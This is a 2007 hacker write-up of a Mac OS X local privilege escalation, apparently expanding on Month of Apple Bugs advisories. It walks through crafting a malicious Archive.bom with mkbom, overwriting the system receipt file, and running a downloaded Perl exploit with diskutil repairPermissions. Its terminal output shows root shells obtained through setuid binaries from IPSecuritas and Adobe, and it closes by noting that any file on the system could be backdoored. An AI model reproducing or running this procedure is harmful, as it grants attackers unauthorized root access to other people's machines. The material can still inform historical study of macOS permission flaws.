--= Talking about MoAB #5 #15 --= OSX Privilege Escalation Author : revenge Date : 2007/16/01 Original Advisories: http://projects.info-pull.com/moab/MOAB-05-01-2007.html http://projects.info-pull.com/moab/MOAB-15-01-2007.html ---------------------------------------------------------------------- -[#] Look at that guy ---------------------------------------------------------------------- In these last days LMH from MoAB released "Multiple OS X Privilege Escalation Vulnerabilities", i've gived a look at that advisory and decided to deeply explore it. I would like to say: really nice works for BOM files, nice works from Apple guys and last but not least nice works from 3rd party developers. Wanna perform a privilege escalation on OS X ? Really simple... ---------------------------------------------------------------------- -[#] Attacking Vector ---------------------------------------------------------------------- As first attacking vector we need to overwrite a suid binary managed by BOM files, once overwritted with a setuid shell just execute: $ diskutil repairPermissions / as well described by LMH, the binary will be restored with setuid permissions without any sanity check and we got our suid shell. Got Pwned. Another attacking vector involves BOM files creation/modification. Let's do a `find` for suid binaries : darkway:~ revenge$ sudo find / -type f -group admin -perm -4000 /Applications/IPSecuritas.app/Contents/MacOS/vpntool /Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool /Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy /Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool Well, last 3 binaries are documented by LMH, the first one is a client for ipsec connection which i use, this one haven't got an Archive.bom, but is a suid binary that i could overwrite: darkway:/Applications/IPSecuritas.app/Contents revenge$ ls -rtl total 16 -rw-r--r-- 1 revenge admin 8 Oct 4 15:20 PkgInfo -rw-r--r-- 1 revenge admin 1100 Oct 4 15:20 Info.plist drwxr-xr-x 2 revenge admin 68 Oct 4 15:20 Resources Disabled drwxr-xr-x 17 revenge admin 578 Oct 4 15:20 Resources drwxr-xr-x 5 revenge wheel 170 Jan 16 18:36 MacOS darkway:/Applications/IPSecuritas.app/Contents revenge$ ls -rtl MacOS/ total 2040 -rwxr-xr-x 1 root admin 121536 Oct 4 15:20 IPSecuritasAutoStarter -rwxr-xr-x 1 root admin 834980 Oct 4 15:20 IPSecuritas -rwsr-xr-x 1 root admin 84396 Jan 16 16:47 vpntool Now we could create an Archive.bom for the ipsec client: darkway:/tmp revenge$ mkdir -p test/Applications/IPSecuritas.app/Contents/MacOS/ darkway:/tmp revenge$ cp /Applications/IPSecuritas.app/Contents/MacOS/* test/Applications/IPSecuritas.app/Contents/MacOS/ darkway:/tmp revenge$ sudo chmod 4755 test/Applications/IPSecuritas.app/Contents/MacOS/vpntool darkway:/tmp revenge$ cd test darkway:/tmp/test revenge$ mkbom ./ boom.bom darkway:/tmp/test revenge$ lsbom boom.bom . 40755 501/0 ./Applications 40755 501/0 ./Applications/IPSecuritas.app 40755 501/0 ./Applications/IPSecuritas.app/Contents 40755 501/0 ./Applications/IPSecuritas.app/Contents/MacOS 40755 501/0 ./Applications/IPSecuritas.app/Contents/MacOS/IPSecuritas 100755 501/0 834980 931126500 ./Applications/IPSecuritas.app/Contents/MacOS/IPSecuritasAutoStarter 100755 501/0 121536 121663420 ./Applications/IPSecuritas.app/Contents/MacOS/vpntool 104755 501/0 84396 795806674 ./boom.bom 100644 501/0 512 1313622608 Ok now we got our BOM file for ipsecuritas, just place it under '/Library/Receipts/Essentials.pkg/Contents' (make first a backup of original Archive.bom) darkway:/tmp/test revenge$ cp boom.bom /Library/Receipts/Essentials.pkg/Contents/Archive.bom Then we could use osx_bom_escalation.pl from http://www.0xcafebabe.it/sploits/osx_bom_escalation.tar.gz If we had write permissions on file we could use Mode 0 for direct overwriting, else we need an osx machine where we got root for creating our special Archive.bom with right permission, then cp target binary in a temp directory, change permissions as we need, (maybe a chmod 4777 from root user ;) ) and create the Archive.bom as shown before. darkway:~/mw0t/sploits/osx revenge$ perl osx_bom_escalation.pl /Applications/IPSecuritas.app/Contents/MacOS/vpntool 0 ./ipsec.bom # Selected Target = /Applications/IPSecuritas.app/Contents/MacOS/vpntool # Backup File at = /tmp/vpntool.bak # Archive.bom backup at = /Library/Receipts/Essentials.pkg/Contents/Archive.bom.bak Started verify/repair permissions on disk disk0s2 Macintosh HD Determining correct file permissions. parent directory ./Users/Shared/SC Info does not exist User differs on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool, should be 0, owner is 501 Group differs on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool, should be 80, group is 0 Permissions differ on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool, should be -rwsrwxr-x , they are -rwxr-xr-x Owner and group corrected on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool Permissions corrected on ./Applications/IPSecuritas.app/Contents/MacOS/vpntool The privileges have been verified or repaired on the selected volume Verify/repair finished permissions on disk disk0s2 Macintosh HD sh-2.05b# id uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin) Now we use Mode 1 for change file permissions, overwriting it with our suid shell. darkway:~ revenge$ perl osx_bom_escalation.pl /Library/Application\ Support/Adobe\ Systems/1.21.005/Adobe\ LM\ Service 1 ./adobe.bom # Selected Target = /Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service # Backup File at = /tmp/Adobe LM Service.bak # Archive.bom backup at = /Library/Receipts/Essentials.pkg/Contents/Archive.bom.bak Started verify/repair permissions on disk disk0s2 Macintosh HD Determining correct file permissions. parent directory ./Users/Shared/SC Info does not exist Permissions differ on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be -rwsrwxrwx , they are -rwsr-xr-x Owner and group corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service Permissions corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service User differs on ./Library/Application Support/Adobe Systems/1.21.005, should be 501, owner is 0 Owner and group corrected on ./Library/Application Support/Adobe Systems/1.21.005 Permissions corrected on ./Library/Application Support/Adobe Systems/1.21.005 User differs on ./Library/Application Support/Adobe Systems, should be 501, owner is 0 Owner and group corrected on ./Library/Application Support/Adobe Systems Permissions corrected on ./Library/Application Support/Adobe Systems User differs on ./Library/Application Support, should be 501, owner is 0 Owner and group corrected on ./Library/Application Support Permissions corrected on ./Library/Application Support The privileges have been verified or repaired on the selected volume Verify/repair finished permissions on disk disk0s2 Macintosh HD Started verify/repair permissions on disk disk0s2 Macintosh HD Determining correct file permissions. parent directory ./Users/Shared/SC Info does not exist User differs on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be 0, owner is 501 Group differs on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be 80, group is 0 Permissions differ on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service, should be -rwsrwxrwx , they are -rwxr-xr-x Owner and group corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service Permissions corrected on ./Library/Application Support/Adobe Systems/1.21.005/Adobe LM Service The privileges have been verified or repaired on the selected volume Verify/repair finished permissions on disk disk0s2 Macintosh HD sh-2.05b# id uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin) Again, got pwned, and with this kind of attack we could backdoor any files on system.